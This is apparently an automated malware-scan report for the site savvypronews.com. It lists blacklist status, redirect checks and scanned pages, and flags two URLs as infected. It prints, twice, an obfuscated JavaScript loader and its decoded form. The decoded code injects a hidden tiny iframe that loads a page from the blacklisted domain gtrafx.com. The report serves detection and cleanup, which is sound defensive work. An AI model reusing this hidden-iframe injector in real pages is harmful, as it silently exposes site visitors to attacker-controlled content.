Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=savvypronews.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: goorls.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 15 Jan 2015 15:04:33 GMT
Server: nginx/1.6.2
Content-Type: text/html
GET / HTTP/1.1
Host: goorls.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 15 Jan 2015 15:04:33 GMT
Server: nginx/1.6.2
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: goorls.info
Referer: http://www.google.com/search?q=goorls.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: goorls.info
Referer: http://www.google.com/search?q=goorls.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://www.savvypronews.com/ | 200 OK Content-Length: 49679 Content-Type: text/html | clean |
http://www.savvypronews.com/Advertising_Web_Pages_083111/TruckSavvy_Advertising_090111.htm | 200 OK Content-Length: 55474 Content-Type: text/html | clean |
http://www.savvypronews.com/Advertising_Web_Pages_083111/TruckSavvy_InFocus_Directory_122211.htm | 200 OK Content-Length: 13968 Content-Type: text/html | clean |
http://www.savvypronews.com/Advertising_Web_Pages_083111/TruckSavvy_Advertising_122211.htm | 200 OK Content-Length: 44728 Content-Type: text/html | clean |
http://www.savvypronews.com/Advertising_Web_Pages_083111/TruckSavvy_InFocus_Help_Wanted_Listings_010913.htm | 200 OK Content-Length: 11473 Content-Type: text/html | clean |
http://www.savvypronews.com/Advertising_Web_Pages_083111/TruckSavvy_InFocus_Help_Wanted_Listings_Inquiry_010913.htm | 200 OK Content-Length: 9149 Content-Type: text/html | clean |
http://www.savvypronews.com/Advertising_Web_Pages_083111/swfobject.js | 200 OK Content-Length: 6880 Content-Type: application/javascript | clean |
http://www.savvypronews.com/Advertising_Web_Pages_083111/TruckSavvy_InFocus_Directory_Online_Inquiry_122211.htm | 200 OK Content-Length: 7758 Content-Type: text/html | clean |
http://www.savvypronews.com/test404page.js | 404 Not Found Content-Length: 7973 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: gtrafx.com var htz={dt:function(){return htz.dh();},dh:function(res){var w="1489,1976,837,551,1369,359,504,1796,87,594,1043,983,1979,1589,476,810,1880,1100,906,1037,731,265,1582,1391,385,1435,458,1506,1299,678,1703,788,654,892,1692,375,1251,196,171,1690,1143,1215,674,1122,804,1502,284,1036,602,1190,73,1685,1807,7,1077,193,1442,1887,1699,1093,565,1754,1882,1219,646,1926,1947,250,474,118,1940,1617,1333,966,739,489,469,1376,1525,1423,918,1950,1461,726,1958,890,919 ...[3553 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { var bdy = document.createElement("body"); try { document.appendChild(bdy); } catch (e) { document.body = bdy; } if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://gtrafx.com/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://gtrafx.com/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appe ...[973 bytes skipped]... | ||
http://www.savvypronews.com/errors/inc/errordocs.js | 200 OK Content-Length: 1184 Content-Type: application/javascript | clean |
http://www.savvypronews.com/AdInfo/AdInfo_EMail_TruckSavvyAuction_071412/TruckSavvy_Auction_Emai_071412.htm | 200 OK Content-Length: 16185 Content-Type: text/html | clean |
http://www.savvypronews.com/Savvy_Pro_News_32/SavvyProNews_32_090412.htm | 200 OK Content-Length: 68785 Content-Type: text/html | clean |
http://www.savvypronews.com/Virtual%20Mall%20Intro-Directory%20Page/VirtualMallIntro031810.htm | 200 OK Content-Length: 67420 Content-Type: text/html | clean |
http://www.trucksavvy.com/adpeeps/adpeeps.php?bfunction=showad&uid=100000&bmode=off&gpos=center&bzone=virtualmall_right&bsize=214x246&btype=3&bpos=default&ver=2.0&btotal=1&btarget=_blank&bborder=0&gspacing=1 | 200 OK Content-Length: 451 Content-Type: text/html | clean |
http://www.trucksavvy.com/adpeeps/adpeeps.php?bfunction=go&uid=100000&cid=1042&aid=44&bzone=virtualmall_right&btype=3 | HTTP/1.1 302 Moved Temporarily Cache-Control: private Connection: close Date: Thu, 25 Dec 2014 18:53:30 GMT Pragma: no-cache Location: http://www.savvypronews.com/ATRO_Engineered_Systems_Virtual_Mall_Pages_072511/ATRO_Engineered_Systems_Entrance2_072511.htm Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: ispCPSESSID=p6a0gtm4b7jmpts2ujm93kkn95; path=/ | malicious |
http://www.savvypronews.com/atro_engineered_systems_virtual_mall_pages_072511/atro_engineered_systems_entrance2_072511.htm | 404 Not Found Content-Length: 7973 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: gtrafx.com var htz={dt:function(){return htz.dh();},dh:function(res){var w="1489,1976,837,551,1369,359,504,1796,87,594,1043,983,1979,1589,476,810,1880,1100,906,1037,731,265,1582,1391,385,1435,458,1506,1299,678,1703,788,654,892,1692,375,1251,196,171,1690,1143,1215,674,1122,804,1502,284,1036,602,1190,73,1685,1807,7,1077,193,1442,1887,1699,1093,565,1754,1882,1219,646,1926,1947,250,474,118,1940,1617,1333,966,739,489,469,1376,1525,1423,918,1950,1461,726,1958,890,919 ...[3553 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { var bdy = document.createElement("body"); try { document.appendChild(bdy); } catch (e) { document.body = bdy; } if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://gtrafx.com/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://gtrafx.com/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appe ...[973 bytes skipped]... |